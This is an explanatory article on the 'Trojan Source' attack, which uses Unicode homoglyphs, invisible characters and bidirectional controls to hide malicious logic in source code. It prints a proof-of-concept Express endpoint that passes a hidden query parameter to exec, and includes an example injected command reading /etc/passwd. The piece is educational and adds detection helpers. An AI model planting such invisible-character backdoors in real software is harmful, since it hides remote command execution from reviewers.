Imagine, for a moment, a backdoor embedded in source code that any human reviewer would overlook and that few IDEs help detect: no matter how thoroughly they check, the malicious code still looks perfectly legitimate. Well, stop imagining it …

… because a group of researchers has already shown that such an attack exists: a paper published a few days ago by the University of Cambridge demonstrates that it can be applied to some of the most popular programming languages in use today.





This attack, dubbed ‘Trojan Source’, takes advantage of two little-known characteristics of Unicode text:

Homoglyphs: characters that look exactly the same even though they have different Unicode code points. For example, a string like “aBeHKopcTxy” can be made up of very different letters depending on whether it is written in the Latin or the Cyrillic alphabet. This also includes certain invisible characters, which look like ordinary spaces without being spaces.

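The bidirectional Unicode mechanism: a feature that allows text written in right-to-left scripts to coexist with text written from left to right. Its invisible control characters can change the order in which characters are displayed, so the code a reviewer sees is not necessarily the code the compiler reads.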
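Both characteristics can be made visible by looking at code points instead of glyphs. The following is a minimal sketch, not the researchers' tooling: the helper names codePoints and hasBidiControl are hypothetical, and the list of bidirectional control characters is an assumption (the embedding, override and isolate controls).

```javascript
// Hypothetical helper: list the Unicode code point of every character.
function codePoints(text) {
  return Array.from(text, (ch) =>
    'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0'));
}

// The same visible string, once in Latin letters and once in Cyrillic ones.
const latin = 'aBeHKopcTxy';
const cyrillic =
  '\u0430\u0412\u0435\u041D\u041A\u043E\u0440\u0441\u0422\u0445\u0443';

console.log(latin === cyrillic);       // false
console.log(codePoints(latin)[0]);     // U+0061 (Latin "a")
console.log(codePoints(cyrillic)[0]);  // U+0430 (Cyrillic "а")

// Assumed list of bidirectional controls: U+202A to U+202E and U+2066 to U+2069.
const BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/u;

// Hypothetical helper: does the text contain any bidirectional control?
function hasBidiControl(text) {
  return BIDI_CONTROLS.test(text);
}

console.log(hasBidiControl('/* note \u202E */'));  // true
console.log(hasBidiControl('/* note */'));         // false
```

A check like this only reports that something unusual is present; deciding whether it is malicious still needs a human.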

Let’s see an example

Security researcher Wolfgang Ettlinger, director of Certitude Consulting, presents on his blog some code snippets that serve as proof of concept for this type of attack.

The first would be something as simple as this:

if (environmentǃ = ENV_PROD) {

At first glance, we are telling the program to do something if the value of ‘environment’ does not match that of ‘ENV_PROD’, with ‘!=’ acting as the inequality operator…

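…but that ‘ǃ’ is not actually an exclamation mark. It is the character U+01C3, a letter used in some African languages for the consonant known as the alveolar click, so it is part of the variable name rather than of the operator. The line therefore assigns ENV_PROD to a variable called ‘environmentǃ’ instead of comparing anything, and the condition is true whenever ENV_PROD is a truthy value.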
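To make the effect concrete, here is a minimal sketch in JavaScript. The values given to ENV_PROD and environment are assumptions chosen for illustration, and the click letter is written as the escape \u01C3 so that it stands out from a real exclamation mark.

```javascript
const ENV_PROD = 'PROD';    // assumed value, for illustration only
const environment = 'DEV';  // we are NOT in production

// A second, unrelated variable whose name ends in U+01C3.
let environment\u01C3;

let branchTaken = false;
// Reads like "environment != ENV_PROD", but it is an assignment
// to the variable declared above.
if (environment\u01C3 = ENV_PROD) {
  branchTaken = true;
}

console.log(branchTaken);  // true, because 'PROD' is truthy
console.log(environment);  // DEV, the real variable was never consulted
```

The real ‘environment’ variable plays no part in the condition, so the branch runs regardless of its value.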

Another example is the following code:

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
  const { timeout, ㅤ} = req.query;
  const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',ㅤ
  ];

  try {
    await Promise.all(checkCommands.map(cmd =>
      cmd && exec(cmd, { timeout: +timeout || 5_000 })));
    res.status(200);
    res.send('ok');
  } catch (e) {
    res.status(500);
    res.send('failed');
  }
});

app.listen(8080);

On the face of it, that script does little more than run two operating system commands (‘ping’ and ‘curl’), each with a fixed set of arguments pointing at a URL or host. There is also a variable, ‘timeout’, which limits how long each command may run. Nothing strange; everything, as we said before, looks legitimate.

However, in two places in the code above, what looks like a space is not actually a space but a character named ‘Hangul Filler’ (U+3164), taken from the Korean alphabet, which does not separate words but merely represents the absence of a glyph.

As a result, that ‘space’ is actually treated as a letter and can therefore act as a variable name in JavaScript. This is how those two fragments could be read:

const { timeout, \u3164 } = req.query;
…
'curl -s http://example.com/', \u3164

This completely alters the logic of the script: the invisible variable is read from the HTTP query string and appended to the list of commands. If the script were reachable on a web server, an attacker could pass arbitrary text in that parameter and have it executed as an operating system command.
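The data flow can be sketched without running any command. In the sketch below, buildCommands is a hypothetical stand-in for the body of the route handler, a plain object stands in for req.query, and the invisible variable is given the visible name ‘hidden’ so the flow can be followed. The injected string is an arbitrary example.

```javascript
const HANGUL_FILLER = '\u3164';

// Hypothetical stand-in for the handler: returns the commands that
// would be passed to exec(), instead of executing them.
function buildCommands(query) {
  // Same destructuring as in the script, with a visible alias.
  const { timeout, [HANGUL_FILLER]: hidden } = query;
  const checkCommands = [
    'ping -c 1 google.com',
    'curl -s http://example.com/',
    hidden,
  ];
  // The script skips empty entries via `cmd && exec(...)`.
  return checkCommands.filter(Boolean);
}

// A normal request: only the two expected commands.
console.log(buildCommands({ timeout: '1000' }).length);  // 2

// A request that also sets the invisible parameter.
const malicious = buildCommands({ [HANGUL_FILLER]: 'cat /etc/passwd' });
console.log(malicious[2]);  // cat /etc/passwd

// How the parameter name looks once URL-encoded.
console.log(encodeURIComponent(HANGUL_FILLER));  // %E3%85%A4
```

In a request, the parameter would therefore appear as something like ‘/network_health?%E3%85%A4=...’, which gives a reviewer or a log filter something concrete to look for.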

Having seen this, the authors of the paper propose some fixes to mitigate the impact of this kind of attack: